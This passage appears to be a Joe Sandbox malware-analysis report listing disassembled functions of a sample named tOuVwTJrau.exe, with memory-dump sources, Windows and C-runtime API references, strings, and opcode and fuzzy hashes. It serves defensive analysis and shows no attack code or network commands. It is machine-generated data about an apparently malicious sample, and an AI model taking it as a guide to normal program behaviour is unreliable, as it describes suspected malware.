list too long, xrefs: 002F26F9

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID:
String ID: list too long
API String ID: 0-1124181908
Opcode ID: 02b67199468ddfeb8996ac42fa5b12567645a17ac067e22d8282590522fb0f89
Instruction ID: 293db4f191d985d64b043653cc6457122946cf43a784991f4b2f959b6be4e521
Opcode Fuzzy Hash: 02b67199468ddfeb8996ac42fa5b12567645a17ac067e22d8282590522fb0f89
Instruction Fuzzy Hash: 565192B4D047199BDB11DF64DC85B9AF7B8FF05300F0042A9E908AB291DB70AE95CF91

Function 0030EEA6 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 132COMMON

Download Yara Rule

Strings

X3, xrefs: 0030EF75
Y3, xrefs: 0030EF6E

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID:
String ID: Y3$X3
API String ID: 0-3297137604
Opcode ID: 938d41d4c9ae6dff59c9750d0eebc4c85d7dc8f51d3690ff03204e09531cf79c
Instruction ID: eb546e68dc2a70e89d19a877cae942592ee7b57bb8194bf1a73b74cd01a37e75
Opcode Fuzzy Hash: 938d41d4c9ae6dff59c9750d0eebc4c85d7dc8f51d3690ff03204e09531cf79c
Instruction Fuzzy Hash: 1F410972B01745EFE726AF38CC51B9ABBA9EB88710F11892EF111DF6C1D771A9408780

Function 00305300 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 107COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00305336
std::_Lockit::_Lockit.LIBCPMT ref: 00305356
std::_Lockit::~_Lockit.LIBCPMT ref: 00305376
std::_Facet_Register.LIBCPMT ref: 00305411
std::_Lockit::~_Lockit.LIBCPMT ref: 00305429

Strings

B0, xrefs: 0030532B

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID: B0
API String ID: 459529453-336002998
Opcode ID: 82479f546715088a84887f3c8038dee959aeb58dea030c6cf721192c965cd812
Instruction ID: 05e6ab72f6b72bab4aacd717f515a73bb41f73c255816f0ffae10d40419b5243
Opcode Fuzzy Hash: 82479f546715088a84887f3c8038dee959aeb58dea030c6cf721192c965cd812
Instruction Fuzzy Hash: 2341DB75A026148BCB26DF54C8A1BAFB7B8EB01710F1541ADE8466B2D1DB70BD01CF80

Function 00318A75 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Strings

ext-ms-, xrefs: 00318AE0
api-ms-, xrefs: 00318ACC

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 8e96f37249a0343272190e56b8f55cfa979203c77095372ee5ef23d728fcbaa1
Instruction ID: a3a47bfb53cf7749d6d9c4eb0405440993884b95ac82debf953a4d53c1c1febe
Opcode Fuzzy Hash: 8e96f37249a0343272190e56b8f55cfa979203c77095372ee5ef23d728fcbaa1
Instruction Fuzzy Hash: AF21E7B2A09211ABDB2B8B749C85ADB376C9F0D760F264511FC06E7291DF70EC40C6E4

Function 003217D6 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00321522: _free.LIBCMT ref: 00321547

_free.LIBCMT ref: 00321824

Part of subcall function 003185A6: HeapFree.KERNEL32(00000000,00000000,?,0032154C,?,00000000,?,?,?,003217EF,?,00000007,?,?,00321C94,?), ref: 003185BC
Part of subcall function 003185A6: GetLastError.KERNEL32(?,?,0032154C,?,00000000,?,?,?,003217EF,?,00000007,?,?,00321C94,?,?), ref: 003185CE

_free.LIBCMT ref: 0032182F
_free.LIBCMT ref: 0032183A
_free.LIBCMT ref: 0032188E
_free.LIBCMT ref: 00321899
_free.LIBCMT ref: 003218A4
_free.LIBCMT ref: 003218AF

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 8e077332dbe01b7341d50a84b951b88c6f42d95a84fc469bf2f7f0e4c6a3109e
Instruction ID: 46a6019c40227fa3f8ad6cdacb4ebede71b1d1c06a8496b291ca87ddec1839b9
Opcode Fuzzy Hash: 8e077332dbe01b7341d50a84b951b88c6f42d95a84fc469bf2f7f0e4c6a3109e
Instruction Fuzzy Hash: 88118132941B14BAD532BBB0DD47FCBB7DD9F9A700F804C14B29BAE052DA24F6454750

Function 0030E292 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,0030E287,?,?,0030E24F,?,?,?), ref: 0030E2A7
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0030E2BA
FreeLibrary.KERNEL32(00000000,?,?,0030E287,?,?,0030E24F,?,?,?), ref: 0030E2DD

Strings

mscoree.dll, xrefs: 0030E2A0
CorExitProcess, xrefs: 0030E2B2
`&0, xrefs: 0030E2CB

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$`&0$mscoree.dll
API String ID: 4061214504-733743835
Opcode ID: b099843ca358c17e2c6f566182cc041300f177d91ce80a620b1520fa2a5c7da4
Instruction ID: 6a3ac550efcafb1931f6b3826fe33fed1d478b457a23a4380eda34244a1cdafa
Opcode Fuzzy Hash: b099843ca358c17e2c6f566182cc041300f177d91ce80a620b1520fa2a5c7da4
Instruction Fuzzy Hash: 96F08C31A01218FBDB13AB90ED4ABDEBABCEB00756F114460F901E21A0CB748F00DB90

Function 002FCA6E Relevance: 9.4, APIs: 6, Instructions: 418COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 287c6d18d68f1f26fc38907820d9fda58763dc094f52a36e64300846d69e8951
Instruction ID: e2106db7b7863d2617475e2ad1b09dcb193368bee30c39af2ed318aae8ec483d
Opcode Fuzzy Hash: 287c6d18d68f1f26fc38907820d9fda58763dc094f52a36e64300846d69e8951
Instruction Fuzzy Hash: CCE15871A1014C9BEF19DF68CD997ADFB76AF41340F608228F505AB3C2C7759A90CB91

Function 00317B5F Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(?,00000000,?), ref: 00317BA7
__fassign.LIBCMT ref: 00317D8C
__fassign.LIBCMT ref: 00317DA9
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00317DF1
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00317E31
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00317ED9

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: 5f34118e55a023deac17e7d81a0c20f12a3f3b5c9f00c342077ad79a7adaf82f
Instruction ID: 137c1f8d6b493fc5a7961c667265b5661a92327ac616c8764279aa7b23bb1fb3
Opcode Fuzzy Hash: 5f34118e55a023deac17e7d81a0c20f12a3f3b5c9f00c342077ad79a7adaf82f
Instruction Fuzzy Hash: 24C18175D042589FCB1ACFA8D8809EDBBF9AF4D314F28416AE855FB241D6319D82CF60

Function 00304B70 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00304BA5
std::_Lockit::_Lockit.LIBCPMT ref: 00304BC7
std::_Lockit::~_Lockit.LIBCPMT ref: 00304BE7
__Getctype.LIBCPMT ref: 00304C7D
std::_Facet_Register.LIBCPMT ref: 00304C9C
std::_Lockit::~_Lockit.LIBCPMT ref: 00304CB4

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
String ID:
API String ID: 1102183713-0
Opcode ID: 3adbb51ac14c346ce420c0d2a3413801e3b8776739e6aee13774c9d1487b318f
Instruction ID: 9ba341af1ece198c2f183a1966f22af4ccc2f9b21d58014d2122297f09bdc7f4
Opcode Fuzzy Hash: 3adbb51ac14c346ce420c0d2a3413801e3b8776739e6aee13774c9d1487b318f
Instruction Fuzzy Hash: F641CDB0D022549BDB27DF54C8A0BAEB7F8EF55710F144169E846AB291EF30BE41CB91

Function 0030CDA4 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0030CD9B,0030B434,00308149,AA6E0749,?,?,?,00000000,0032CE07,000000FF,?,002E2576,?,?), ref: 0030CDB2
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0030CDC0
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0030CDD9
SetLastError.KERNEL32(00000000,?,00000000,0032CE07,000000FF,?,002E2576,?,?,?,002E3BA5,00000000,?,00000000,0032C7A0,000000FF), ref: 0030CE2B

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 36c338d63652baa7a2d069411ca7b007afd12920a66e6239884579c070888dfc
Instruction ID: 463ec186f360a8b454ab3c56a0de0011578805dc2f382c186e8fbb57fe29df1f
Opcode Fuzzy Hash: 36c338d63652baa7a2d069411ca7b007afd12920a66e6239884579c070888dfc
Instruction Fuzzy Hash: F501D43622A3125FE6272BB5ACA66572A88EB03777B31033AF5118D0F2EF515C11A241

Function 0030CEBB Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 0030CF82
___AdjustPointer.LIBCMT ref: 0030CFA5
___AdjustPointer.LIBCMT ref: 0030D041

Strings

`&0, xrefs: 0030CF1A

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: AdjustPointer
String ID: `&0
API String ID: 1740715915-1385275834
Opcode ID: a18aa5a49987928832f71080fe4b41253f35d29b6f85cd0c06da12a004d8269f
Instruction ID: 7bfc491aa93ef25b7ef4f8bc3a18f3caafc18486e2ad493eae4ed24632414a40
Opcode Fuzzy Hash: a18aa5a49987928832f71080fe4b41253f35d29b6f85cd0c06da12a004d8269f
Instruction Fuzzy Hash: 8751E176613203AFDB2B9F54D8A1BBAB3A5FF04700F254229E8059B6E1D731ED41C751

Function 0031FA37 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\tOuVwTJrau.exe, xrefs: 0031FA3C

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID:
String ID: C:\Users\user\Desktop\tOuVwTJrau.exe
API String ID: 0-2256859958
Opcode ID: 5304f0414d0f182a3b7d88306db4ee6e6a3b00616b587c9c2cfbe96b26c633e2
Instruction ID: ab241924edf5013baad03959121870c2217799f2818d06a60d3c8cbb356c714b
Opcode Fuzzy Hash: 5304f0414d0f182a3b7d88306db4ee6e6a3b00616b587c9c2cfbe96b26c633e2
Instruction Fuzzy Hash: 0A21D471204206AF9B2AAF648C909EB77ADEF0C3647254634F96DCB150DB75DCC08BA0

Function 00308458 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

Part of subcall function 003083B9: GetModuleHandleExW.KERNEL32(00000002,00000000,?,?,?,0030840B,00000014,?,0030844C,00000014,?,002E2D32,00000000,00000014), ref: 003083C5

__Mtx_unlock.LIBCPMT ref: 0030849E
FreeLibraryWhenCallbackReturns.KERNEL32(?,00000000,AA6E0749,?,?,?,00328C80,000000FF), ref: 003084C6
__Mtx_unlock.LIBCPMT ref: 00308501
__Cnd_broadcast.LIBCPMT ref: 00308512

Strings

`&0, xrefs: 003084D4

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: Mtx_unlock$CallbackCnd_broadcastFreeHandleLibraryModuleReturnsWhen
String ID: `&0
API String ID: 420990631-1385275834
Opcode ID: 7f34b8c791b2ced4cf63b74496cf613e358bd111f5c1d931bae379714a9accb6
Instruction ID: c6c082caa5836d492cbaede422a41fca88d99f14fb2ce60670194b2aca99558a
Opcode Fuzzy Hash: 7f34b8c791b2ced4cf63b74496cf613e358bd111f5c1d931bae379714a9accb6
Instruction Fuzzy Hash: D7110F7E541610ABCA137B65EC62B5FB76CEF41B20F01481AF9459B2D3DF35E400C690

Function 002E4910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 002E499F

Part of subcall function 0030B446: RaiseException.KERNEL32(E06D7363,00000001,00000003,00343A84,?,?,?,00343A84), ref: 0030B4A6

Strings

ios_base::badbit set, xrefs: 002E4945
ios_base::failbit set, xrefs: 002E494F
HE4, xrefs: 002E4984
ios_base::eofbit set, xrefs: 002E4954

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: HE4$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3109751735-3105575111
Opcode ID: 2e28953757b96a329e51543f23409250f43294a889eb6304a83cd681be7fb098
Instruction ID: 27d79f106a9a88bae6d9fdc2bee9881ba2952278a34c35bdf7666e9d8a59bd20
Opcode Fuzzy Hash: 2e28953757b96a329e51543f23409250f43294a889eb6304a83cd681be7fb098
Instruction Fuzzy Hash: CA1138B1520745ABC701EF5AC882B96F3E8EF51310F54852AF855AB682E770E924CB51

Function 0030DDF7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,0030DEB8,?,?,00000000,?,?,0030DF6A,00000002,FlsGetValue,003333D8,003333E0,?), ref: 0030DE87

Strings

api-ms-, xrefs: 0030DE47

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 38f1ee2a677c6d4d072cb3165082474ecb85eedac67f5158db3cd45c2ef34892
Instruction ID: 3ca9bcc6184655f1eb569fb00ffc7acc026639f3a270c123914676ff5a34d054
Opcode Fuzzy Hash: 38f1ee2a677c6d4d072cb3165082474ecb85eedac67f5158db3cd45c2ef34892
Instruction Fuzzy Hash: B3119136A42221ABDF234BA8DC55B5B73E89F21B70F160620F911EF2C0D670ED00C6D0

Function 00309F5A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

SleepConditionVariableCS.KERNEL32(?,00309EF7,00000064,?,?,?,002E2E1C,0034CDC4), ref: 00309F7D
LeaveCriticalSection.KERNEL32(00348FA8,002E2E1C,?,00309EF7,00000064,?,?,?,002E2E1C,0034CDC4), ref: 00309F87
WaitForSingleObjectEx.KERNEL32(002E2E1C,00000000,?,00309EF7,00000064,?,?,?,002E2E1C,0034CDC4), ref: 00309F98
EnterCriticalSection.KERNEL32(00348FA8,?,00309EF7,00000064,?,?,?,002E2E1C,0034CDC4), ref: 00309F9F

Strings

`&0, xrefs: 00309F77

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
String ID: `&0
API String ID: 3269011525-1385275834
Opcode ID: 3f863fa5add857b6604fb18c18d998c62051b4a860a596459916fda60e9ade66
Instruction ID: d0561b2afadce4748f2a26b663d4eb7453eaa97b2798c651608da60a5b7560ee
Opcode Fuzzy Hash: 3f863fa5add857b6604fb18c18d998c62051b4a860a596459916fda60e9ade66
Instruction Fuzzy Hash: 8EE01239A45125ABCB032B50FC49ACD3F5EEF49F62F044111F9059A5A1CE6129159BD4

Function 00327D2C Relevance: 7.7, APIs: 5, Instructions: 244COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?), ref: 00327DCF
__alloca_probe_16.LIBCMT ref: 00327E85
__alloca_probe_16.LIBCMT ref: 00327F1B
__freea.LIBCMT ref: 00327F86
__freea.LIBCMT ref: 00327F92

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: __alloca_probe_16__freea$Info
String ID:
API String ID: 2330168043-0
Opcode ID: 902e1902e6072b04524fb1e9ff51c522272cd3b2566273c6af80b01782660075
Instruction ID: fad042cd88f178a193d728a910a376338e1563eacdee970bc3dfbe6c1eb44bc1
Opcode Fuzzy Hash: 902e1902e6072b04524fb1e9ff51c522272cd3b2566273c6af80b01782660075
Instruction Fuzzy Hash: 3E81937290C229ABDF239F64E951AEE7BB9BF49710F1A0195E904AB241D7319C40C7B1

Function 002FC950 Relevance: 7.7, APIs: 5, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 323adf0bef1df299c7639a6e0a1ca75dd5dd63918e65cd2cf3daf3c517362075
Instruction ID: f8d307f0618d1566b5fc14a755ec24a6628832ce2fb2eace8e12221129cd2251
Opcode Fuzzy Hash: 323adf0bef1df299c7639a6e0a1ca75dd5dd63918e65cd2cf3daf3c517362075
Instruction Fuzzy Hash: C681F4B091024CEFEF15EFA8C959BEEBBB9EF04344F604159E9016B2C2C7755A44CB92

Function 0031C826 Relevance: 7.7, APIs: 5, Instructions: 199COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 0031C8AA
__alloca_probe_16.LIBCMT ref: 0031C970
__freea.LIBCMT ref: 0031C9DC

Part of subcall function 003187D5: HeapAlloc.KERNEL32(00000000,?,?,?,0031FF40,00000220,?,?,?,?,?,?,0030F4C2,?), ref: 00318807

__freea.LIBCMT ref: 0031C9E5
__freea.LIBCMT ref: 0031CA08

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: 86a9c6a86aed16df40c2ed1f9645451f03c669f8c1a1e9560db047071d9c8317
Instruction ID: 0a8ddcc868895de373d8865cd3a6dbb68aad0220072c76fbccd4f7066590957e
Opcode Fuzzy Hash: 86a9c6a86aed16df40c2ed1f9645451f03c669f8c1a1e9560db047071d9c8317
